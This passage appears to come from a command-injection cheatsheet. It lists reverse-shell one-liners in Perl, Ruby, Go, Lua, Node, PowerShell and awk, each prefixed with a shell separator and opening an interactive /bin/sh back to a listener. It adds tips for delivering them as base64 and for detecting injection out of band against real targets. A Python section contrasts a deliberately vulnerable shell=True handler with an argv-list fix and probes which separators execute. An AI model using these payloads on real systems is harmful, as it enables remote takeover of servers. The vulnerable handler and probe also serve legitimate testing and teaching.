; perl -e 'use Socket; $i="127.0.0.1"; $p=1234; socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/sh -i");};'
; ruby -rsocket -e'f=TCPSocket.open("127.0.0.1",1234).to_i; exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
; cat > /tmp/r.go <<'EOF'
package main
import ("net"; "os/exec")
func main() {
	c, err := net.Dial("tcp", "127.0.0.1:1234")
	if err != nil { return }
	cmd := exec.Command("/bin/sh", "-i")
	cmd.Stdin, cmd.Stdout, cmd.Stderr = c, c, c
	cmd.Run()
}
EOF
; go run /tmp/r.go
; lua -e 'local s=require("socket"); local t=assert(s.tcp()); t:connect("127.0.0.1",1234); while true do local r,x=assert(t:receive("*l")); local f=assert(io.popen(r,"r")); local b=assert(f:read("*a")); t:send(b);end'
; node -e 'var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []); var client = new net.Socket(); client.connect(1234, "127.0.0.1", function() { client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); });'
; powershell -NoP -NonI -W Hidden -Exec Bypass -Command $client = New-Object System.Net.Sockets.TCPClient("127.0.0.1",1234); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}
; awk 'BEGIN {s = "/inet/tcp/0/127.0.0.1/1234"; while(42) { do{ printf "> " |& s; s |& getline c; if(c) { while((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

go has no inline-source flag (a go run -e form does not run), so the Go variant writes a file first; it is two commands and only worth trying where go is installed and the injection point accepts multi-line input. nc -e needs a netcat build that supports it (traditional netcat or nmap's ncat, not the OpenBSD package); the /dev/tcp form needs bash rather than sh; the lua one-liner needs the LuaSocket module; the awk one-liner needs gawk, whose |& coprocess operator it relies on. The PowerShell line as commonly circulated omits the $client = assignment that the rest of it uses. Where quoting in the injection point is awkward, deliver any of these as a base64 blob instead (echo <base64> | base64 -d | sh).
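The separator list only helps if you can tell which ones the injection point honours. The Python below is an added example, not code from the cheatsheet: ping_vulnerable stands in for a server that hands user input to /bin/sh (shell=True), ping_safe for the argv-list fix, and injection_probe tries each separator with a canary whose text never appears contiguously in the payload, so seeing it in the output proves the shell executed it rather than merely echoed the input. The echo stand-in, the INJ3CT3D marker and the POSIX shell are assumptions; run it on a Unix host.

```python
import subprocess

MARKER = "INJ3CT3D"
# The canary prints MARKER, but the literal string is split in the payload, so its
# presence in the output proves execution rather than reflection of the input.
CANARY_CMD = "printf 'INJ3''CT3D'"


def ping_vulnerable(host: str) -> str:
    """Constructed stand-in for a vulnerable handler: the whole line goes to /bin/sh,
    so every shell metacharacter in `host` is live. (echo replaces ping to stay offline.)"""
    proc = subprocess.run(f"echo pinging {host}", shell=True, capture_output=True, text=True)
    return proc.stdout


def ping_safe(host: str) -> str:
    """The fix: an argv list and no shell. The value is one argument and is never parsed."""
    proc = subprocess.run(["echo", "pinging", host], capture_output=True, text=True)
    return proc.stdout


# Separator -> how the canary command is spliced into the value. '||' only fires when the
# preceding command fails, which is why it usually misses against a working command.
SEPARATORS = {
    ";": "x; {cmd}",
    "|": "x | {cmd}",
    "&&": "x && {cmd}",
    "||": "x || {cmd}",
    "newline": "x\n{cmd}",
    "$()": "x$({cmd})",
    "backtick": "x`{cmd}`",
}


def injection_probe(runner) -> list:
    """Return the separator names for which the canary actually executed."""
    hits = []
    for name, template in SEPARATORS.items():
        output = runner(template.format(cmd=CANARY_CMD))
        if MARKER in output:
            hits.append(name)
    return hits


if __name__ == "__main__":
    print("vulnerable:", injection_probe(ping_vulnerable))
    print("safe:      ", injection_probe(ping_safe))
```

Against a real target you rarely see stdout, so swap the canary for something observable out of band (a sleep you can time, or a DNS lookup to a host you control) while keeping the same separator matrix.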